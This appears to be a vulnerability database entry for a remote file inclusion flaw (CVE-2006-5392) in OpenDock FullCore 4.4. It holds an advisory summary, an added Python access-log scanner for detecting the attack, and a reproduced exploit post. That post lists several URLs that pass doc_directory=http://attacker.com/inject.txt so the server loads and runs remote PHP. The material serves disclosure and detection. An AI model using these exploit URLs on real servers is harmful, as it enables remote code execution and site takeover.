OpenDock FullCore Input Validation Vulnerability in User Request Handling

Vulnerability ID: 1111309
Vulnerability type: Input validation
Published: 2006-10-16
Updated: 2006-10-20
CVE ID: CVE-2006-5392
CNNVD-ID: CNNVD-200610-314
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/2570
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-314
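|Vulnerability details
OpenDock FullCore is an open-source content management system. OpenDock FullCore has an input validation vulnerability in its handling of user requests; a remote attacker may exploit it to execute arbitrary commands on the server with the privileges of the web process. Scripts such as sw/lib_cart/cart.php, sw/lib_cart/lib_cart.php and sw/lib_cart/lib_read_cart.php do not properly validate the doc_directory parameter, so an attacker can cause arbitrary PHP code to be executed by including arbitrary files from local or external resources.
|Exploit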
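An added example (not from the original advisory or the OpenDock project): a Python scan of web server access logs that flags requests supplying the doc_directory parameter described above in the query string. The log format, the sample entries and the category names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request target inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# URL scheme or PHP stream wrapper at the start of a value (http://, ftp://, data:).
WRAPPER_RE = re.compile(r'^(?:[a-z][a-z0-9+.\-]*://|data:)', re.I)

def classify(value):
    """Say why a doc_directory value deserves attention."""
    for _ in range(3):  # undo double encoding such as %253A
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if WRAPPER_RE.match(value):
        return "remote-or-wrapper"
    if ".." in value or value.startswith(("/", "\\")):
        return "local-path"
    # Assumption: the application sets this variable itself, so any
    # client-supplied value is worth a look.
    return "parameter-supplied"

def scan(lines):
    """Return (line_number, path, reason) for each request that sets doc_directory."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            # PHP turns dots and spaces in parameter names into underscores.
            if key.replace(".", "_").replace(" ", "_") == "doc_directory":
                hits.append((number, url.path, classify(value)))
    return hits

# Constructed sample entries (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Oct/2006:10:00:01 +0000] "GET /cms/sw/index_sw.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [16/Oct/2006:10:02:13 +0000] "GET /cms/sw/lib_cart/cart.php?doc_directory=http://files.example/x.txt? HTTP/1.1" 200 312',
    '192.0.2.44 - - [16/Oct/2006:10:02:20 +0000] "GET /cms/sw/lib_find/find.php?doc.directory=..%2F..%2Ftmp%2Fx HTTP/1.1" 200 90',
    '192.0.2.45 - - [16/Oct/2006:10:03:02 +0000] "GET /cms/sw/lib_comment/comment.php?doc_directory=ftp%253A%252F%252Ffiles.example%252Fx HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Values sent in POST bodies or cookies do not appear in access logs, so this scan covers query strings only.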
---------------------------------------------------------------------------------
OpenDock FullCore <= v4.4 Remote File Include Vulnerabilities
---------------------------------------------------------------------------------

Author : Matdhule

Contact : matdhule@gmail.com

Application : OpenDock FullCore

Version : 4.4

Download : http://web.opendock.net//up_file/opendock_full_core_44_66_od.zip

---------------------------------------------------------------------------------

Vulnerability:

In folder sw we found the vulnerable script index_sw.php.

-----------------------index_sw.php---------------------------------
<?php

include $doc_directory.$path_sw."lib_config/lib_sys_config.php";
include $doc_directory.$path_sw."lib_main/lib_main.php";

-------------------------------------------------------------------------

Input passed to the "$doc_directory" parameter in index_sw.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files:

sw/lib_cart/cart.php
sw/lib_cart/lib_cart.php
sw/lib_cart/lib_read_cart.php
sw/lib_cart/lib_sys_cart.php
sw/lib_cart/txt_info_cart.php
sw/lib_comment/comment.php
sw/lib_comment/find_comment.php
sw/lib_comment/lib_comment.php
sw/lib_find/find.php

And many other files...

---------------------------------------------------------------------------------

Exploit :

http://target.com/[OpenDockFullCore_Path]/sw/index_sw.php?doc_directory=http://attacker.com/inject.txt ?
http://target.com/[OpenDockFullCore_Path]/sw/lib_cart/cart.php?doc_directory=http://attacker.com/inject.txt ?
http://target.com/[OpenDockFullCore_Path]/sw/lib_cart/lib_cart.php?doc_directory=http://attacker.com/inject.txt ?
http://target.com/[OpenDockFullCore_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt ?

---------------------------------------------------------------------------------

Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, bius, thama & all crews #nyubicrew, #e-c-h-o, @dalnet

# milw0rm.com [2006-10-16]
|References

Source: XF
Name: opendock-docdirectory-file-include(29578)
Link: http://xforce.iss.net/xforce/xfdb/29578
Source: BID
Name: 20573
Link: http://www.securityfocus.com/bid/20573
Source: MILW0RM
Name: 2570
Link: http://www.milw0rm.com/exploits/2570
Source: VUPEN
Name: ADV-2006-4052
Link: http://www.frsirt.com/english/advisories/2006/4052
Source: OSVDB
Name: 29915
Link: http://www.osvdb.org/29915
Source: OSVDB
Name: 29914
Link: http://www.osvdb.org/29914
Source: OSVDB
Name: 29913
Link: http://www.osvdb.org/29913
Source: OSVDB
Name: 29912
Link: http://www.osvdb.org/29912
Source: OSVDB
Name: 29911
Link: http://www.osvdb.org/29911
Source: OSVDB
Name: 29910
Link: http://www.osvdb.org/29910
Source: OSVDB
Name: 29909
Link: http://www.osvdb.org/29909
Source: OSVDB
Name: 29908
Link: http://www.osvdb.org/29908
Source: OSVDB
Name: 29907
Link: http://www.osvdb.org/29907
Source: OSVDB
Name: 29906
Link: http://www.osvdb.org/29906
Source: SECUNIA
Name: 22410
Link: http://secunia.com/advisories/22410
Source: MILW0RM
Name: 2570
Link: http://milw0rm.com/exploits/2570